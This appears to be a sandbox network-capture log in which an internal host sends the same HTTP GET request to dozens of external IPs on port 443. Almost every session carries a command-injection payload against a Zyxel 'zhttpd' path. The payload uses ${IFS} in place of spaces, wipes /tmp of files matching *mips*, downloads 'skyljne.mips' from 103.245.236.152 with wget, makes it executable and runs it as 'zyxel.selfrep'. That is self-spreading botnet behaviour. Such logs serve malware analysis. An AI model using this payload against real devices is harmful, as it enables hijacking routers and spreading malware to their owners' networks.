                                        Jan 14, 2024 16:18:36.250662088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1975192.168.2.1348558186.228.49.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250706911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1976192.168.2.1339064118.125.171.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250741959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1977192.168.2.1338580182.172.227.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250828028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1978192.168.2.134388631.61.9.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250864983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1979192.168.2.1333020142.74.158.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250936985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1980192.168.2.1350614217.204.42.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250950098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1981192.168.2.1352544100.181.164.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250986099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1982192.168.2.1348226191.95.213.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251035929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1983192.168.2.1337502142.79.139.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251060009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1984192.168.2.1345192216.101.240.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251106024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1985192.168.2.1355668151.18.202.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251188993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1986192.168.2.1332834167.118.112.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251199961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1987192.168.2.135773088.121.152.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251285076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1988192.168.2.1342864186.245.64.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251296997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1989192.168.2.134629219.162.152.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251336098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1990192.168.2.1333386207.115.76.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251386881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1991192.168.2.1349820123.17.29.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251425028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1992192.168.2.1344006222.227.222.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251441956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1993192.168.2.135928845.8.239.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251482010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1994192.168.2.1359700157.125.9.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251511097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1995192.168.2.1360574162.226.243.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251548052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1996192.168.2.134844441.97.230.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251593113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1997192.168.2.1335730145.123.127.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251636028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1998192.168.2.1338514148.116.174.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251682043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1999192.168.2.1354676104.88.63.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251710892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2000192.168.2.133488020.132.63.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251748085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2001192.168.2.133696067.90.21.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251780987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2002192.168.2.1339840188.235.37.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251816988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2003192.168.2.135540045.79.188.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251873016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2004192.168.2.1338776115.26.183.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251903057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2005192.168.2.135192845.1.116.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.251950979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2006192.168.2.135916670.58.35.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252001047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2007192.168.2.133772813.234.225.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252026081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2008192.168.2.134575087.253.10.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252104044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2009192.168.2.1355732123.125.210.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252104998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2010192.168.2.1357456139.184.197.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252161980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2011192.168.2.1347944209.245.23.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252191067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2012192.168.2.135834484.245.19.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252243042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2013192.168.2.135641285.127.71.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252307892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2014192.168.2.133800244.132.72.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252316952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2015192.168.2.13348625.65.67.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252374887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2016192.168.2.133711697.7.139.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252408028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2017192.168.2.1358782135.240.166.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252441883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2018192.168.2.135118496.143.97.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252486944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2019192.168.2.135029466.42.199.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252522945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2020192.168.2.1359052151.72.91.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252561092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2021192.168.2.134017654.170.226.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252634048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2022192.168.2.134518264.13.11.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252692938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2023192.168.2.1342448158.1.157.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252692938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2024192.168.2.135593442.141.145.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252717972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2025192.168.2.1360378206.247.225.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252796888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2026192.168.2.1346874152.6.201.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252804995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2027192.168.2.1334954118.68.116.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252856970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2028192.168.2.1349060191.190.154.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252862930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2029192.168.2.133916076.47.172.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252921104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2030192.168.2.1342878168.160.101.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.252974033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2031192.168.2.134542035.216.13.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253022909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2032192.168.2.135323853.54.120.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253043890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2033192.168.2.1333298223.6.242.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253106117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2034192.168.2.134168834.32.247.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253134012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2035192.168.2.134094840.231.84.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253180027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2036192.168.2.1333046211.198.36.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253233910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2037192.168.2.1336952135.245.247.174443
                                        TimestampBytes transferredDirectionData
